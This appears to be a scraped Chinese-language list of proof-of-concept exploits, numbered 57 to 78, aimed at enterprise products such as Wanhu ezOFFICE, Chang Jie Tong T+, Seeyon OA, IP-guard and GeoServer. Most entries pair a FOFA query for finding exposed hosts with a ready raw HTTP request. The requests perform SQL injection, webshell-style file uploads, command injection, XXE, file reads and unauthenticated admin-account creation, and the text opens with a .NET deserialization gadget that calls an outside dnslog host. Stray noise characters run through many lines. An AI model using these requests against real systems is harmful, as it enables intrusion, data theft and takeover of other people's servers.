2 C9 C) j- ^1 s, Y: ` "storeID":{
: o9 A2 [' z. v "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",) N7 D& Z) H9 }! A; L
"MethodName":"Start",% z( _" T8 a# P& k% M
"ObjectInstance":{
+ U. [5 {% v- T1 y3 c "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 d1 x; F- U& ~4 F5 a, y9 ?1 Z9 Z3 k
"StartInfo": {( ?5 n) E9 W- ^+ G
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
' s; D0 _ I6 L! g, K6 I- | S- E "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
) S, z) I9 Y2 q2 z! c" t% Q }8 ?7 \+ _3 N: Y: f0 K$ c
}
) d* {$ B' ^* ]% ~7 I) e$ h } ]0 g& L- L9 m
}; w2 F; ?: Z! i0 ?3 x1 h
9 W7 t6 d2 G9 I+ ?) U D
" q1 u" m# C7 ^* U8 c. _57. 畅捷通T+ keyEdit.aspx SQL注入
( t9 [( r7 c: ~# |: y$ N0 i1 DFOFA:app="畅捷通-TPlus"( q7 }: S( M. K, r) `6 ]- _$ ?
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.14 |4 D. I$ V1 b) w2 N
Host: host4 ]( u& y# G2 } m; _9 x
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+ k; D. @5 s* Q& P. bAccept-Charset: utf-8( p8 C2 l# Q3 R* x& k' x' @, y
Accept-Encoding: gzip, deflate
z1 `1 q: w7 hConnection: close1 L/ G0 w! l6 c8 U8 f# s
* Z& @, c" V" s
3 F7 L9 U/ B. b4 E' l' y" z' {/ U
58. 畅捷通T+ KeyInfoList.aspx sql注入
& z- ?0 {% \+ O( Y9 K* DFOFA:app="畅捷通-TPlus"$ j, F9 E) q+ Q; C
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
" U) y1 Q$ n; U+ Z6 LHost: your-ip
( x0 C7 Z [6 Y+ x: _1 e* yUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.366 J4 f3 c1 q9 F& |
Accept-Charset: utf-8
/ g9 H( K: k: z1 W/ tAccept-Encoding: gzip, deflate) D" {- h- ?) E X
Connection: close% G( `& Y4 _* l2 I; e
7 g1 O8 Z- o+ r& I
% b: o0 I* Y0 Q# r6 l7 j59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
/ b' e+ C/ m) r/ S* JFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
( G2 N9 Q: Q* ePOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.17 Y1 U8 j" }7 U; S! O1 T
Host: 192.168.86.128:9090) b- }( Z2 e$ Q7 g) q: d1 m
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% j# @) r# y% Q% `1 OConnection: close
, X1 E. G6 T$ W/ b5 f, wContent-Length: 1669
9 V0 @+ G* o- A4 |+ g: v% e0 yAccept: */*4 o- ^! B$ ^( E. X
Accept-Language: en/ N* r3 f" Z3 j, x; \
Content-Type: application/x-www-form-urlencoded C0 B) q/ E( ] ~; B6 k
Accept-Encoding: gzip& M5 e {/ ?( ?
" u5 g+ K* W1 o" R c0 b/ q" G7 A
PAYLOAD
9 c a0 @& F6 k K# ]! z
6 U% n- p8 R" [8 Y0 F) N( _3 G
. \+ u! L8 H4 G" N2 s8 M- }( E( o60. 百卓Smart管理平台 importexport.php SQL注入
$ W" V1 b3 \) ~FOFA:title="Smart管理平台"
, u' o, ?8 L$ xGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
! Y4 P) S- x7 p6 R1 T% a* I5 ~Host:5 |1 B0 g2 |/ N* J( @: l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' m; a2 z+ M& W& M" e! i2 y. e9 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' E9 U" N* Z+ i5 ~Accept-Encoding: gzip, deflate5 ~& M7 W9 e8 E" e
Accept-Language: zh-CN,zh;q=0.9
' ?: n: B J7 `4 OConnection: close. b% L! m2 \" |0 v+ q, m# ~
1 ~7 V- k/ Z7 D" @
9 @5 `4 F& K) U2 Z! [- B4 U61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
8 C. ~ v0 @* R6 mFOFA: title="欢迎使用浙大恩特客户资源管理系统"* I, d# m1 j2 p1 U* Y
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
! Q9 S. h! h0 f1 FHost: x.x.x.x9 z* R$ J M+ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% Y! W9 k; |. x9 v
Connection: close
3 c9 ~9 ]3 y% c9 U% \Content-Length: 27
1 |% h7 c- B$ X; }1 B8 w v! D r0 ]Accept: */*! I( ?( Z4 R4 w
Accept-Encoding: gzip, deflate
# V3 J6 v8 Z$ rAccept-Language: en
8 C5 N3 N/ G0 g2 lContent-Type: application/x-www-form-urlencoded3 P' o0 W- u* U; _
! M0 g d; A' I( k' E" l8uxssX66eqrqtKObcVa0kid98xa% `& z6 t# j: v1 ~6 d% t. x3 P
: [$ T3 T2 d7 b
) W: O! R2 ]) T' m* ~62. IP-guard WebServer 远程命令执行
8 X: Z" N' k2 C. C/ qFOFA:"IP-guard" && icon_hash="2030860561"
1 Z7 a* ~4 W1 _* _4 a7 S5 V8 [# p3 e( TGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
# t9 Z2 g, U! N3 oHost: x.x.x.x) d; c: D4 T5 K: c! f9 r' b; ]# F
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
0 a3 n% r! c A: e! o0 E$ ^+ R5 M6 aConnection: close
: |, y: P! @" k" G& IAccept: */*
! t" Z- a" c5 L: T2 g+ xAccept-Language: en
* h7 O- M7 x! `& G6 I# i4 \Accept-Encoding: gzip
. H7 m5 L5 g( X+ \, \1 r5 q# U9 [$ I
1 j3 U4 X: H c0 M# t( L0 d
; y) i! B5 T6 H2 q访问$ e, G+ M: M2 L c8 y
" s4 C5 V2 Q+ ^% _" aGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1- u5 I0 C l# Q! T0 z9 X
Host: x.x.x.x
2 B, F8 U% L. w W# \% E; r3 t n" W" N, i# j* U' i, a2 Y
5 |7 i2 K$ A8 r7 ]
63. IP-guard WebServer任意文件读取, n" c/ `0 X. z8 t! e9 w! `" M4 O) h5 E
IP-guard < 4.82.0609.07 A9 o3 I) O" E
FOFA:icon_hash="2030860561"
4 X. i7 j4 _/ I0 u! t4 _POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.15 ~: k6 x# r( X$ h. W
Host: your-ip+ v- R4 I4 l. W" w5 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% z* Y7 B3 [1 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: l0 P3 [, z' \* D
Accept-Encoding: gzip, deflate3 N0 W7 k! B4 l) {$ u
Accept-Language: zh-CN,zh;q=0.9. L9 t' t' l8 M7 z; w5 o$ {
Connection: close$ a% w+ D( c6 i/ Z7 ~' X
Content-Type: application/x-www-form-urlencoded, |! Q4 {* m* ?9 I: O
; Z* K, j% e. G. v1 v* l1 h& p8 b
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A4 U' w- z, U) e
$ o; }+ ]" Y) z" H
64. 捷诚管理信息系统CWSFinanceCommon SQL注入" @: e- X5 D1 ^, t6 Z6 o$ a9 {
FOFA:body="/Scripts/EnjoyMsg.js"
4 b3 R0 |: M% e5 [6 I9 iPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1+ \; {" x9 [& z$ B2 ^
Host: 192.168.86.128:9001' a4 C/ }; p3 i9 ^0 a5 t
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
# V# \0 ]7 `5 q1 j% w. ZConnection: close. l0 h3 C9 W0 ?5 j6 I/ f& H
Content-Length: 3691 R! g2 T, l. Z% w6 A
Accept: */*+ Y& U% l% X. R
Accept-Language: en6 M# R! L9 K& p2 O0 s! k$ x
Content-Type: text/xml; charset=utf-8/ W p% b8 X7 e( O2 ]
Accept-Encoding: gzip' R( H1 } l. h
" w% f9 O: m$ q6 g. J
<?xml version="1.0" encoding="utf-8"?>
' C, J. Y3 @, L8 j7 I<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
% n6 h; [' \7 m" |- H<soap:Body>4 n4 v( |) M! e7 _# \# J
<GetOSpById xmlns="http://tempuri.org/">
6 C: k" s8 ]0 l6 m <sId>1';waitfor delay '0:0:5'--+</sId>+ d1 B- N9 M' p: p' q1 i6 ~
</GetOSpById>
' @' A& }9 R1 }, E </soap:Body>! o5 y4 V- S! r6 V- L2 M
</soap:Envelope>" Y1 x& f2 I4 \+ d) g- A
, t& n6 c6 U* c3 O) y/ y. P2 Y3 S
2 ]5 K4 c6 m0 ^
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过, b7 c3 @- J2 Y: e; {8 J
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
- K: }2 L, |( t响应200即成功创建账号test123456/123456
& y* H' e6 N! k2 dPOST /SystemMng.ashx HTTP/1.1% L& _! w: H, Z/ Z. |
Host:
' R6 l. o3 R9 D) I- `User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 t; t6 H! d3 P) g+ oAccept-Encoding: gzip, deflate5 e+ C6 Z1 z3 C' n" q! S
Accept: */*
0 Q# u3 h' e9 @! Z! `Connection: close
, e% U/ ~0 J0 I) pAccept-Language: en5 n0 v z5 t7 N
Content-Length: 174
$ b1 I% h, d6 ]4 L
. V+ Q' W/ a' {. x) F2 f9 @operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
- m! c& B/ H7 s$ C8 B# b# E7 b4 v2 L. y) I
+ @! G2 t* Z+ d
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 ]+ _$ ~# ?0 W$ S. ~
FOFA:app="万户ezOFFICE协同管理平台"
* Y% L6 ~& F+ ]8 @' n# _, J+ ^& l/ ~ m3 ?' y f* u6 L; [ M
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
4 j* Y# h1 w/ z6 H! RHost: x.x.x.x
. S3 R8 } K v' RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
- _( F, J8 L7 ?$ u8 HConnection: close
1 q7 J7 t1 e0 fAccept: */*( t. O% Q$ k9 M+ I/ B
Accept-Language: en
% D* y; Z' O& w' ~8 ^Accept-Encoding: gzip# m5 q2 n" Z6 I& r
9 u9 y! \. a. n# c: Q9 U7 L) Y
. X+ q, q6 b9 Y4 H1 a( Y1 r! V. u% F第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
- `( a0 }0 ], K5 G2 v
* y4 |" e: j' F/ |# l67. 万户ezOFFICE wpsservlet任意文件上传
- c' {0 |: L* f7 i, M- xFOFA:app="万户网络-ezOFFICE"
& v$ S2 N# q g* QnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
3 S+ _' y. S/ y, L( d" n- lPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
5 Y. V' I m" |: ]Host: x.x.x.x
; N6 W# p# Q M7 y# }User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
2 T# ^6 A9 i1 x, K( ?4 VContent-Length: 173" @7 X+ I- a2 B0 V$ y( ~- Z+ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
1 w' D1 J* X3 A7 ]: GAccept-Encoding: gzip, deflate
4 Q- e0 n- ~/ E: OAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.37 ]3 F% H: L1 `
Connection: close
5 e$ k! |7 C! F4 lContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
/ y |) F* n1 L3 G' f, UDNT: 1% q0 E9 T) Z! f8 ]
Upgrade-Insecure-Requests: 1
- o( Z* [3 }2 p. F! h( s0 U8 v) ^% P# ?- l) K4 T
--ufuadpxathqvxfqnuyuqaozvseiueerp- \' G8 s7 {% ~# O
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
5 W( R4 t: D4 l0 n3 b1 A) ]: s; Q, t& C0 @0 }8 o
<% out.print("sasdfghjkj");%>* K1 ]+ Y |2 ^# _" b
--ufuadpxathqvxfqnuyuqaozvseiueerp--
% U, K2 P% l' \0 T, z
7 t; c* R) s4 d6 Z$ E$ D8 b4 w
: D( |6 _+ A" t: \文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp" n0 J6 }, C7 W1 C
+ y; y. t' M! ]$ e: u d9 o' ?68. 万户ezOFFICE wf_printnum.jsp SQL注入
2 Z0 v, V7 L1 Q+ N1 d+ pFOFA:app="万户ezOFFICE协同管理平台"/ a0 Z. H" ]) H, e7 X
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
4 m1 V$ C# A/ T! U0 d/ w/ aHost: {{host}}
5 Q4 n4 Z, Z) G0 B0 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.366 a8 V S3 J3 ?* W. Q4 B
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
8 m+ [. m: D/ d: O& {0 iAccept-Encoding: gzip, deflate
! Q7 H5 Z3 }* I6 D' O9 fAccept-Language: zh-CN,zh;q=0.9: e* I' Y1 v9 w
Connection: close
- z6 p& d9 \9 v* ]( U) {) S
- }: d9 e! X; h% f. t5 a
7 O2 C$ G$ I. D+ ~69. 万户 ezOFFICE contract_gd.jsp SQL注入$ t L: S& q9 b6 R Y5 K
FOFA:app="万户ezOFFICE协同管理平台"
8 M" M7 x* Q& } iGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
7 S( B9 ^9 [/ G* I$ CHost: your-ip3 {. b: q8 \, w
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- V( D- h C: j; e( H
Accept-Encoding: gzip, deflate
, a+ U: E2 `* v R6 x! Q8 m; r+ {Accept: */*7 b# z0 {( {5 Y0 q# q
Connection: keep-alive
8 D% d" F: G! k' e1 v; c: j0 s2 U7 a
7 l: B6 j; H) f% q- T
70. 万户ezEIP success 命令执行+ O1 Q* ~( K9 s4 l" f( m$ n
FOFA:app="万户网络-ezEIP"
4 ?% i5 ?, p/ ]POST /member/success.aspx HTTP/1.16 H+ ?3 e7 h n0 O( I( H4 m* J
Host: {{Hostname}} X5 v+ ^* L! B t! h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ U1 T# l* o' Y
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=, t" R5 n$ A: E2 ?% v9 p! \
Content-Type: application/x-www-form-urlencoded
5 `1 k, B2 s: U0 @# e* nTYPE: C4 }: x$ M" H2 M9 A
Content-Length: 167021 k4 w+ h, n0 C9 s
1 m; L, L, \4 W& l) C2 t- n1 O2 L
__VIEWSTATE=PAYLOAD! ?; ]! U9 ~# Q8 r/ n. T, F5 H7 ], Q3 p7 L
; s( s; s; {1 I3 g( h+ Y6 l6 v3 h
8 N: ~6 y7 B) R- r, \* Z8 I y. Q1 `71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入; Q7 H) X _- Z0 k
FOFA:body="PM2项目管理系统BS版增强工具.zip"
2 y( X. W) a6 g3 t: b! b% SGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.14 E/ h: g9 z4 g5 D
Host: x.x.x.xx.x.x.x
& i+ x9 s# v+ k' B! f6 xUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
# e0 i3 Q: e) m: A$ J0 k. vConnection: close
0 E. b/ |8 A5 y2 s+ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. Z5 z# ]+ M4 w S+ {0 W* {% E. p: p n
Accept-Encoding: gzip, deflate4 P. \4 |$ t5 y- p; Z! I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% \9 W3 Z! N0 m7 {
Upgrade-Insecure-Requests: 17 J% U/ t3 t6 q- K
0 H3 V+ ?3 X- a3 i. A
' T$ ?% h2 g$ U# ]2 g72. 致远OA getAjaxDataServlet XXE- D6 l& a* X5 j' |
FOFA:app="致远互联-OA"
2 A9 X/ j. t4 `$ kPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
6 V. N z' |$ N' w: e4 }Host: 192.168.40.131:8099
* \7 } S$ C1 z* u2 W: Y5 yUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
+ M9 m: J/ }7 c _5 F; ?Connection: close( ]' A* u7 q$ [ I- Q" C0 z
Content-Length: 583
+ F0 f% \: ]! O6 a1 uContent-Type: application/x-www-form-urlencoded
' Z [/ [+ E/ H5 |0 _( LAccept-Encoding: gzip- F- `' _6 Z, N/ K) e; z
?" H' `5 L3 |S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
6 O0 }$ W5 P1 O# N" ?# n6 y' C3 ?) {: Z, J9 d+ v( [: M9 \
. n( {# I0 K: M* w! \$ u- S
73. GeoServer wms远程代码执行: {9 c" M* A; q
FOFA:icon_hash=”97540678”
* q4 _ }) W# }: U2 z" GPOST /geoserver/wms HTTP/1.1% c% F' _: i! `3 k8 C, E2 [
Host:; y5 s& v" N2 p6 s6 G( }, |) G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" l/ l! k* x) l/ Y w( ]& tContent-Length: 1981
6 e( g6 }5 I! ?Accept-Encoding: gzip, deflate8 s7 L6 S* Q- B
Connection: close
" l) w2 {3 p' [9 r; nContent-Type: application/xml& |/ t6 F7 R2 P3 J, _ g" o. R
SL-CE-SUID: 33 ^9 l7 u% i/ s% L! l6 s, K
+ x4 J! z' h1 V. s
PAYLOAD
: E v7 h R) c4 `
, ] j, f$ G. S6 T; T* T
# R1 J$ ]4 z% w8 {& r8 u5 |* ~74. 致远M3-server 6_1sp1 反序列化RCE
6 V' [8 E6 W6 G4 U7 g* T' [FOFA:title="M3-Server"4 {7 v: g, E! C' I9 i. r4 b
PAYLOAD
- Y+ T8 f( B( U; j% n
1 |/ X! B! G' c/ p( n5 {- f75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
7 E. r/ P1 R7 T) q' @) m: fFOFA:app="TELESQUARE-TLR-2005KSH"
7 F& w$ W+ c2 gGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.11 N. \- I! B( X/ v& w7 y) @
Host: x.x.x.x
8 n9 ~. b; ]2 n* ]( \ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 T: @- I+ G* P8 [Connection: close; S9 d3 ` x& r2 g5 `
Accept: */*
2 z% R7 `! H* a- ^/ WAccept-Language: en
/ x# `6 b, m3 Q6 a4 F3 |: \Accept-Encoding: gzip4 D; \8 i& j4 r: k3 ?6 ^
0 Q K" k& e2 a
" k% a2 n; Z# R9 c+ f
GET /cgi-bin/test28256.txt HTTP/1.1
8 h: i% Y! z2 I j- q4 BHost: x.x.x.x
: b4 f% ~6 Y, ?2 P" V O! J! L+ f, N: r" L" B, I% x2 S
% s" K6 Y7 D. w/ C& d9 \# q3 H76. 新开普掌上校园服务管理平台service.action远程命令执行
1 R. {9 e+ A% [% T* C% k% }% IFOFA:title="掌上校园服务管理平台"( V5 \3 `- m! j8 z# y8 u
POST /service_transport/service.action HTTP/1.1
, e$ ~$ y4 P8 P; KHost: x.x.x.x
6 f' \: M. c# b0 y0 `: jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
) _5 w" H7 B, M6 O9 KConnection: close
1 R! ~8 S# Z& S% l; K8 b/ e, L) W4 WContent-Length: 211
& J" b/ | m# L" @- `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 i0 U; g- a2 W: @$ k
Accept-Encoding: gzip, deflate1 g L% r0 y1 m- m4 g' w. q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ k3 o. {3 U/ c
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4( [' v/ j; t7 }/ U+ u: f
Upgrade-Insecure-Requests: 11 m8 m9 B- v9 V" J0 ~; q6 [: V
/ X7 Y9 \9 x: u7 `9 x3 l/ E- n4 ?
{
9 g' l$ ~ [* R z- H: @: k* \/ e"command": "GetFZinfo",, h, n# a# P9 @. G; [3 P8 G. R( _
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"; g& M0 ?& h' ?
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"7 J2 V& o) H( c% x) k
}
+ L" E7 M& X4 N0 p7 Q- I) |. K( E- a: d( P6 ]) J8 ~/ Y
3 Q. @0 J; e& H+ i4 `- Y4 `' GGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1! R1 z9 G' ^2 x3 `2 d5 Z/ m
Host: x.x.x.x7 N# w \* y1 O7 |# {- f
E: e: _0 v' O* T+ I
b+ n( @' l+ e3 G1 R( `8 B: ^$ e
77. F22服装管理软件系统UploadHandler.ashx任意文件上传/ T o5 X; \2 @/ C1 w# `- f
FOFA:body="F22WEB登陆"4 D# E4 N3 u3 _& m) E8 \) n8 H
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
0 `: |4 l8 z- _' @# ?1 tHost: x.x.x.x
" k6 {% I+ N0 O: gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 K0 d9 s* Z! o+ h! V
Connection: close* h7 K( }7 F) D/ T9 ^& U* \3 [
Content-Length: 433
- c4 M, b& W5 AAccept: */*
1 W( z3 h4 X( R9 N" n/ WAccept-Encoding: gzip, deflate+ s% c/ g4 p& r8 y/ w
Accept-Language: zh-CN,zh;q=0.9
/ O& A/ P! |1 KContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix7 h d0 ~1 ?) q: S, Q
1 A" |, a3 e' Y
------------398jnjVTTlDVXHlE7yYnfwBoix' M8 ]; X+ z1 K' a+ y V& e, c# O
Content-Disposition: form-data; name="folder"! J# w- e$ x m# I" s4 @
! `5 G* `# _3 G8 ]- `. O7 g# K' M X/upload/udplog" A( D! p' V( ]1 b6 i; {! m
------------398jnjVTTlDVXHlE7yYnfwBoix
, i5 G3 ?3 T) u; p( @% _/ `Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
- I' |# q+ Z0 u \! r EContent-Type: application/octet-stream$ \/ \* f( w- X+ _8 g# t0 I
1 N* R& v$ P6 r* k* \' z6 xhello1234567
+ l% v% M9 o: v2 P$ u$ B4 d------------398jnjVTTlDVXHlE7yYnfwBoix
0 s ^- D$ d1 y0 q: ^Content-Disposition: form-data; name="Upload"/ J0 ?& I0 C* G1 L$ X( P
1 D9 [+ o, Y. k6 u$ U( d$ z% ^
Submit Query3 i5 F' a5 ~9 I" P/ ?6 @
------------398jnjVTTlDVXHlE7yYnfwBoix--* f: [3 e) S5 ~+ ]
3 G, E# _) V3 H% h1 I
. A5 F: S: v4 w" f) b( ^+ `78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传' F% T( E2 `5 o6 I$ L o2 ]9 \
FOFA:icon_hash="2001627082"8 b' i% Q4 q9 g8 P* Y% I5 ]( p
POST /Platform/System/FileUpload.ashx HTTP/1.1$ H4 i& N6 `% ^, S2 v1 |; @9 l7 i
Host: x.x.x.x
9 {1 i5 @4 w" G! l7 X" C8 ]: A* G8 J1 O9 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ a' j' j1 c! j! R; Q. H
Connection: close
) K- o% F# c% B' FContent-Length: 336 G. ]) q) ]9 X/ F3 a+ v, c+ A+ y. |
Accept-Encoding: gzip
3 p& i9 ?. J8 {3 I1 i% FContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l6 k, C7 `/ v& E# c4 f4 J
5 z0 x' @: F: u, P4 ]4 D------YsOxWxSvj1KyZow1PTsh98fdu6l' T( `$ ^& ]8 Z1 E! ]
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
9 S' p- n; A1 u/ {7 V! pContent-Type: image/png1 T: \; I% r4 R" A& M% L
0 P% j- X, D" k1 t! _; Y' }, aYsOxWxSvj1KyZow1PTsh98fdu6l
0 o( I9 U( }8 g! w- U; X% S" v t------YsOxWxSvj1KyZow1PTsh98fdu6l" X6 u7 j! R. h7 _
Content-Disposition: form-data; name="target"
% G$ f# Q3 g; e m2 o( [- T. x3 C! o8 T+ _; ^# }1 X: s
/Applications/SkillDevelopAndEHS/# Y/ t8 k5 D4 T2 Z
------YsOxWxSvj1KyZow1PTsh98fdu6l--
( h4 g4 D* O" E g5 P T8 R0 u& c5 U) p) m$ o- ?& {
, l$ ?& @5 `' m8 P% y* H l
